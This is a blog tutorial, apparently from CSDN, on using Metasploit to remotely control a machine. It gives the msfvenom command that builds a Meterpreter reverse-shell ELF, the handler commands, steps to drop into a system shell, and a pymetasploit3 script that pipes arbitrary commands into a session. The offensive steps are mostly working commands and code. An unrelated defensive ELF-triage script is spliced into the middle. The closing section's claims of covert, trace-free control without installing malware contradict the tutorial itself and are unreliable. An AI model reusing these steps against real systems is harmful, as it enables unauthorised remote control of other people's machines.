Use Metasploit to generate a reverse shell program to achieve remote control

1. About metasploit

        Metasploit is an open source penetration testing framework developed and maintained by Rapid7. It provides a powerful set of tools and resources for evaluating and testing the security of computer systems. The goal of Metasploit is to help security professionals discover and exploit vulnerabilities in systems in order to improve system security.

        Background on Metasploit:
        Originally created by HD Moore in 2003, Metasploit started out as an open-source security toolset for simplifying network penetration testing and exploits. It started out as a command-line tool, but over time Metasploit evolved into a powerful and easy-to-use penetration testing framework. Its open-source nature allows the global security community to contribute to and improve Metasploit, making it one of the most popular penetration testing tools today.

The main functions of Metasploit:
1. Vulnerability scanning and assessment: Metasploit provides a powerful vulnerability scanning engine, which can be used to automatically scan for vulnerabilities in the target system. It can scan for common vulnerabilities, such as SQL injection, XSS, etc., and generate detailed reports to help security professionals evaluate the security of the system.

2. Exploitation: Metasploit provides an extensive set of exploit modules for exploiting known system vulnerabilities. These modules can be used to gain access to the target system, execute commands, extract sensitive information, and more.

3. Social Engineering: Metasploit also provides some social engineering modules for testing a person's skills in phishing, malware distribution, etc. These modules help security professionals assess employees' resilience to social engineering attacks.

4. Remote control: An important function of Metasploit is the ability to provide remote control. By establishing a connection to a target system, security professionals can remotely execute commands, upload and download files, take screenshots, and more.

5. Modular architecture: Metasploit's architecture is modular, which allows users to customize and extend its functionality as needed. Users can write their own modules, or obtain modules shared by other users from the Metasploit community.

6. Automation and integration: Metasploit can be integrated with other security tools and platforms to automate penetration testing and vulnerability management. It can be integrated with tools such as Nessus and Nmap to provide a more comprehensive penetration testing solution.

In summary:
        Metasploit is a powerful penetration testing framework designed to help security professionals evaluate and improve the security of their systems. It provides a series of functions such as vulnerability scanning, vulnerability exploitation, social engineering, remote control, etc., enabling security professionals to better discover and exploit vulnerabilities in the system. The open-source nature and modular architecture of Metasploit make it an active security community where users can contribute and improve Metasploit, keeping it updated and adaptable to the ever-changing threat environment.

        If you want to use Metasploit, the easiest way is to use Kali Linux. For the installation method, please refer to this blog post:

5 minutes to complete Kali linux installation (based on VirtualBox)_virtualbox installation kali_Xiaoxiangzi's Blog-CSDN Blog

2. Generate a reverse shell program on the controlled end, and send remote control commands from the master control end

2.1 Generate a reverse shell program

        Use msfvenom on the Kali machine to build the reverse shell program that runs on the controlled end; when executed, it actively connects back to the listening port on the master control end.

        Here the IP of the master control end is set to the local address 127.0.0.1 and its port to 4444. Because the controlled end is executed on the Kali machine itself, the payload chosen is "linux/x64/meterpreter/reverse_tcp". There are many payload types: searching for "reverse_tcp" in msfconsole lists a large number of them, for Windows, Android and other targets, so you can pick the one that matches the operating environment of your controlled end.

┌──(root㉿kali)-[/home/kali/reverse_tcp_test]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o client_x64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: client_x64.bin
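To show what the 250-byte file above looks like from the defender's side, here is an added Python triage script (not from the original post and not part of Metasploit) that parses the ELF64 header and program headers and flags the traits of such a raw stager: no section headers, one PT_LOAD segment mapped RWX, and a file that is nothing but headers plus payload. The sample is constructed inline with the same layout and 130 inert zero bytes in place of the payload; the 0x400078 entry point and 0x400000 load address are assumed values.

```python
import struct

# ELF64 little-endian header (64 bytes) and program header (56 bytes) layouts
ELF_MAGIC = b"\x7fELF"
EHDR_FMT = "<4sBBBBB7xHHIQQQIHHHHHH"
PHDR_FMT = "<IIQQQQQQ"
PT_LOAD, PF_X, PF_W, PF_R = 1, 1, 2, 4


def triage_elf(blob: bytes) -> dict:
    """Parse an ELF64 file and report traits typical of a raw msfvenom -f elf stager."""
    if len(blob) < 64 or blob[:4] != ELF_MAGIC:
        return {"is_elf": False, "payload_bytes": 0, "findings": ["not an ELF file"]}
    (_, _, _, _, _, _, _, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, e_shnum, _) = struct.unpack_from(EHDR_FMT, blob, 0)
    findings = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(PHDR_FMT, blob, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_LOAD and p_flags & (PF_W | PF_X) == (PF_W | PF_X):
            findings.append(f"segment {i}: PT_LOAD mapped writable and executable (RWX)")
    if e_shnum == 0:
        findings.append("no section headers: file is only an ELF header plus program headers")
    if e_phnum == 1 and len(blob) < 4096:
        findings.append(f"single segment and only {len(blob)} bytes: consistent with a stager")
    payload_bytes = len(blob) - (64 + e_phnum * e_phentsize)
    return {"is_elf": True, "payload_bytes": payload_bytes, "findings": findings}


def build_sample(body: bytes) -> bytes:
    """Constructed sample with the header + one RWX PT_LOAD layout; body is inert filler."""
    total = 64 + 56 + len(body)
    ehdr = struct.pack(EHDR_FMT, ELF_MAGIC, 2, 1, 1, 0, 0,   # ELF64, little-endian
                       2, 0x3E, 1, 0x400078, 64, 0, 0,        # ET_EXEC, x86-64, entry (assumed)
                       64, 56, 1, 0, 0, 0)                    # one phdr, no section headers
    phdr = struct.pack(PHDR_FMT, PT_LOAD, PF_R | PF_W | PF_X, 0,
                       0x400000, 0x400000, total, total, 0x1000)
    return ehdr + phdr + body


# 130 zero bytes stand in for the 130-byte payload msfvenom reported; total is 250 bytes
SAMPLE = build_sample(b"\x00" * 130)

if __name__ == "__main__":
    for line in triage_elf(SAMPLE)["findings"]:
        print("[!]", line)
```

Run it against the real client_x64.bin (open the file in binary mode and pass the bytes to triage_elf) and the same three findings appear, which is what makes this layout easy to spot in file-based detection.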

2.2 Configure the console and execute remote control commands

        Open Metasploit by typing "msfconsole" at the Kali command line.

        Use the following commands to configure the handler on the master control end:

use payload/linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
set ExitOnSession false

After the configuration is complete, use

exploit -j -z

to open the listening port on the master control end.

        Add execution permission to client_x64.bin and execute it. On the master control end you can then see that a "Meterpreter session" has opened (127.0.0.1:4444 -> 127.0.0.1:45906).

        Press Ctrl+C and then run "sessions -l" to see the id of the session established at this point; "sessions -i <id>" enters the reverse shell. You can execute some commands there, but you will quickly notice that the set of usable commands is very limited (ls works, but whoami, echo, etc. do not), because the Meterpreter prompt only accepts Meterpreter's own built-in commands, not the target's shell commands.

        To do more you need to enter the system shell. In Meterpreter, "meterpreter > shell" switches from the Meterpreter session to the interactive shell of the target system, so you can execute commands and actions on the target as if you were at its local command line. This is an important step because it lets you interact with the target system directly and perform more advanced tasks.

        At this point you can control the controlled end. The higher the privileges of the process on the controlled end, the more you can do.

        The screenshot of the whole process execution is as follows:

3. Use the API of the Metasploit framework to send custom control commands automatically

3.1 Pymetasploit3

Pymetasploit3 is an API for the Metasploit framework written in Python. It provides the ability to interact with the Metasploit framework, enabling users to use various functions and tools of Metasploit programmatically. Here are the main uses of Pymetasploit3:

1. Penetration testing automation: Pymetasploit3 allows users to automate penetration testing tasks by writing Python scripts. Users can use Pymetasploit3 API to perform various penetration testing operations, such as scanning for vulnerabilities, exploiting vulnerabilities, gaining access to the target system, etc. This enables penetration testers to perform repetitive tasks more efficiently and integrate the Metasploit framework into their workflow.

2. Custom module development: Pymetasploit3 provides a set of APIs that enable users to write their own Metasploit modules. Users can use Pymetasploit3 API to develop customized modules based on their own needs and characteristics of the target system to achieve more accurate and effective penetration testing. This enables users to extend and customize the functionality of the Metasploit framework according to specific scenarios and needs.

3. Data analysis and report generation: Pymetasploit3 provides functions for accessing and processing data generated by the Metasploit framework. Users can use the Pymetasploit3 API to obtain the result data during the penetration testing process, such as scanning reports, vulnerability information, etc. This enables users to analyze and interpret penetration testing results and generate detailed reports to communicate test results and recommendations to stakeholders.

4. Vulnerability management and tracking: Pymetasploit3 allows users to manage and track vulnerabilities programmatically. Users can use the Pymetasploit3 API to obtain vulnerability information, update vulnerability status, track vulnerability repair progress, etc. This enables users to better organize and manage vulnerabilities found in penetration testing, improving the efficiency and accuracy of vulnerability remediation.

        In summary:
        Pymetasploit3 is an API for the Metasploit framework written in Python that provides functionality to interact with the Metasploit framework. Its primary uses include penetration testing automation, custom module development, data analysis and report generation, and vulnerability management and tracking. Using Pymetasploit3, users can programmatically perform penetration testing tasks more efficiently, customize and extend the functions of the Metasploit framework, and analyze and report test results.

3.2 Some programs using Pymetasploit3

3.2.1 About RPC

        Before using it, enter the following in msfconsole:

load msgrpc

        You will see output similar to:

msf6 payload(linux/x64/meterpreter/reverse_tcp) > load msgrpc
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: DCcxOGeW
[*] Successfully loaded plugin: msgrpc

        The RPC password "DCcxOGeW" generated here will be used later. The password can also be configured by yourself.

        Maybe you want to ask, what can "load msgrpc" do? Its role is to load the Metasploit RPC (Remote Procedure Call) service for remote communication and control with the Metasploit framework.

        Specifically, the "load msgrpc" command starts an RPC service that allows users to connect to the Metasploit framework over the network and interact using the API. Once the RPC service is started, users can write scripts in various programming languages (such as Python, Ruby, etc.), communicate with the Metasploit framework through the API, and perform various penetration testing tasks and operations.

        By loading msgrpc, users can realize the following functions:

1. Remote control: Users can connect to the Metasploit framework through the network to perform various penetration testing tasks from a remote location, such as scanning for vulnerabilities, exploiting vulnerabilities, gaining access rights, etc. This is very useful for scenarios where penetration testing tasks need to be performed remotely, such as performing penetration testing tasks on a remote server.

2. Automation and integration: Through the RPC service, users can write scripts to automate penetration testing tasks and integrate the Metasploit framework into their workflow. Users can use various programming languages and tools to interact with the Metasploit framework, enabling more efficient and customized penetration testing.

3. Distributed penetration testing: By starting multiple RPC services, users can implement distributed penetration testing. This means that users can perform penetration testing tasks on multiple machines at the same time, thereby improving the efficiency and speed of testing.

3.2.2 Python program (for reference only)

You can write the following Python file to connect to the Metasploit framework through the Metasploit RPC (Remote Procedure Call) service:

# -*- coding:utf-8 -*-
import time
from pymetasploit3.msfrpc import MsfRpcClient

# The parameters must match the output of "load msgrpc" (server, port, password)
client = MsfRpcClient(password='DCcxOGeW', server='127.0.0.1', port=55552)
# The session id is obtained with "sessions -l"; it is usually 1
session = client.sessions.session("1")
if session:
    print("Meterpreter会话已建立")
    # start_shell() sends the "shell" command to the Meterpreter session,
    # switching it to the interactive system shell of the target
    shell = session.start_shell()
    if shell:
        print("交互式Shell已启动")

        while True:
            command = input("请输入命令:")
            if command.lower() == "exit":
                break
            else:
                print("您输入的命令是:", command)
                session.write(command + "\n")
                # Output is not available immediately after write(); give the target
                # a moment to respond, otherwise read() may return an empty string
                time.sleep(1)
                output = session.read()
                print(output)
    else:
        print("无法启动交互式Shell")

I have also seen many other ways of writing this on GitHub; a few are listed here for reference:

GitHub - Coalfire-Research/pymetasploit3 at 0afc16bc04016187de6786dbb93c94874b5e3101

https://github.com/ir-st/ANPT/blob/62213fd804887f4d78531af87696b743c2e684a6/example/MsfRPC%20testing.py#L4

https://github.com/sec-js/Xerror/blob/07ec57cabcd27cdb47c89af452bdf4ed07207347/xerror/parsing/msf_rpc_session_handler.py#L3

4. Finally

        Metasploit's method of generating a reverse shell for remote control has the following advantages:

1. Highly customizable: The Metasploit framework provides a wealth of modules and tools that can generate customized rebound shells according to specific needs. Users can choose the corresponding modules and configurations according to the characteristics and actual conditions of the target system, so as to achieve more precise and effective remote control.

2. Multi-platform support: Metasploit framework supports multiple operating systems and platforms, including Windows, Linux, Mac, etc. This means that users can use Metasploit to generate reverse shells suitable for different operating systems to achieve cross-platform remote control.

3. Powerful ability to exploit vulnerabilities: Metasploit framework integrates a large number of exploit modules, which can use known vulnerabilities to gain access to the target system. By generating a reverse shell, users can use these exploit modules to achieve remote control, thereby performing various operations on the target system, such as executing commands, uploading and downloading files, and obtaining sensitive information.

4. No prior installation of malware required: Methods of spawning reverse shells usually do not require any prior installation of malware on the target system. This means that by exploiting known vulnerabilities, users can directly execute code on the target system to achieve remote control without leaving traces on the target system that can be detected and removed.

5. Highly flexible and extensible: Metasploit framework's reverse shell generation method can be customized and extended according to specific needs. Users can use the API and programming language provided by the Metasploit framework to write custom modules and scripts to achieve more complex and specific remote control functions.

        Therefore, Metasploit's method of generating reverse shells for remote control has the advantages of high customization, multi-platform support, powerful vulnerability exploitation capabilities, no need to install malware in advance, and high flexibility and scalability. This enables users to achieve precise, effective and covert remote control according to specific needs and characteristics of the target system.

Origin blog.csdn.net/qq_33163046/article/details/132328117